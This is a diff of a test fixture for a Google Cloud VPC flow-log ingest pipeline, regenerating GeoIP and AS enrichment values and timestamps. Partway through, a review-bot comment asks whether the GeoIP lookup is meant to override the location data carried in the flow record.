- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 9200,
@@ -23195,7 +24305,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392462700Z",
+ "ingested": "2021-12-14T14:43:27.415294136Z",
 "original": "{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:08.466742414Z",
@@ -23217,11 +24327,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 9200,
@@ -23293,7 +24408,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392468100Z",
+ "ingested": "2021-12-14T14:43:27.415294530Z",
 "original": "{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:59.500483335Z",
@@ -23315,11 +24430,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 53096,
@@ -23391,7 +24511,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392473600Z",
+ "ingested": "2021-12-14T14:43:27.415294914Z",
 "original": "{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:01.853096315Z",
@@ -23407,11 +24527,16 @@
 },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 53096,
@@ -23489,7 +24614,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392479200Z",
+ "ingested": "2021-12-14T14:43:27.415295841Z",
 "original": "{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:01.853096315Z",
@@ -23511,11 +24636,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 33966,
@@ -23587,7 +24717,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392484800Z",
+ "ingested": "2021-12-14T14:43:27.415296273Z",
 "original": "{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:20.510698570Z",
@@ -23598,18 +24728,51 @@
 }
 },
 {
+ "@timestamp": "2019-06-14T03:50:17.763Z",
+ "ecs": {
+ "version": "1.12.0"
+ },
+ "related": {
+ "ip": [
+ "10.139.99.242",
+ "67.43.156.13"
+ ]
+ },
 "log": {
 "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
 },
+ "gcp": {
+ "vpcflow": {
+ "reporter": "SRC",
+ "rtt": {
+ "ms": 96
+ }
+ },
+ "source": {
+ "vpc": {
+ "project_id": "my-sample-project",
+ "subnetwork_name": "default",
+ "vpc_name": "default"
+ },
+ "instance": {
+ "region": "us-east1",
+ "project_id": "my-sample-project",
+ "zone": "us-east1-b"
+ }
+ }
+ },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa",
- "city_name": "Broomfield",
- "region_name": "Colorado"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 33652
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 65318,
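Review bot: The new expectation for this document drops `"city_name": "Broomfield"` and `"region_name": "Colorado"` from `destination.geo`, and replaces the `usa` / AS `33652` values that the flow log itself carries in `dest_location` with `Bhutan` / `BT` / AS `35908`, even though `event.original` in the surrounding hunks still reports `asn:33652, city:Broomfield, country:usa`. That pattern is consistent with the GeoIP enrichment now overwriting the provider-supplied location fields rather than only filling in what the payload lacks, presumably because the test run resolves `67.43.156.x` against a synthetic test database; the commit (a dependency bump per the go.mod hunk) does not say this is intended. Before accepting the regenerated fixture, confirm which behaviour the pipeline wants, since SOC consumers of `destination.geo.*` will otherwise lose the city/region the flow log already provided, and the test will silently lock in the overwrite. If the overwrite is intended, a one-line note in the pipeline description or test README such as `GeoIP lookup takes precedence over src_location/dest_location from the flow record` would make the expectation reviewable.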
@@ -23623,6 +24786,16 @@
 "domain": "elasticsearch",
 "ip": "10.139.99.242"
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415296655Z",
+ "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:00.760345858Z",
+ "end": "2019-06-14T03:49:56.220599950Z",
+ "id": "1gq7q7afe373ev",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -23634,25 +24807,24 @@
 "iana_number": "6",
 "packets": 583,
 "direction": "outbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:17.763Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "10.139.99.242",
- "67.43.156.13"
+ "67.43.156.13",
+ "10.87.40.76"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
- "vpcflow": {
- "reporter": "SRC",
- "rtt": {
- "ms": 96
- }
- },
- "source": {
+ "destination": {
 "vpc": {
 "project_id": "my-sample-project",
 "subnetwork_name": "default",
@@ -23663,23 +24835,14 @@
 "project_id": "my-sample-project",
 "zone": "us-east1-b"
 }
+ },
+ "vpcflow": {
+ "reporter": "DEST",
+ "rtt": {
+ "ms": 36
+ }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.392490400Z",
- "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:40:00.760345858Z",
- "end": "2019-06-14T03:49:56.220599950Z",
- "id": "1gq7q7afe373ev",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "address": "10.87.40.76",
 "port": 5601,
@@ -23688,11 +24851,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 34536,
@@ -23700,6 +24868,16 @@
 "ip": "67.43.156.13",
 "packets": 7
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415297051Z",
+ "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:47:51.050074134Z",
+ "end": "2019-06-14T03:47:51.162931667Z",
+ "id": "1gq7q7afe373em",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -23711,19 +24889,30 @@
 "iana_number": "6",
 "packets": 7,
 "direction": "inbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:17.763Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "67.43.156.13",
- "10.87.40.76"
+ "10.87.40.76",
+ "67.43.156.14"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
- "destination": {
+ "vpcflow": {
+ "reporter": "SRC",
+ "rtt": {
+ "ms": 36
+ }
+ },
+ "source": {
 "vpc": {
 "project_id": "my-sample-project",
 "subnetwork_name": "default",
@@ -23734,36 +24923,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392495900Z", - "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:51.050074134Z", - "end": "2019-06-14T03:47:51.162931667Z", - "id": "1gq7q7afe373em", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56478, 
@@ -23777,6 +24950,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415297443Z", + "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:20.450631492Z", + "end": "2019-06-14T03:47:20.566586739Z", + "id": "1gq7q7afe373ew", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -23788,59 +24971,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.763Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.14" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392501400Z", - "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:20.450631492Z", - "end": "2019-06-14T03:47:20.566586739Z", - "id": "1gq7q7afe373ew", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + } + }, + { + "log": { 
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -23918,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392507100Z", + "ingested": "2021-12-14T14:43:27.415297834Z", "original": "{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", 
@@ -23929,41 +25077,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 53096, - "bytes": 1458, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -23974,6 +25087,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -23994,8 +25110,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 53096, + "bytes": 1458, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.392512800Z", + "ingested": "2021-12-14T14:43:27.415298343Z", "original": "{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": 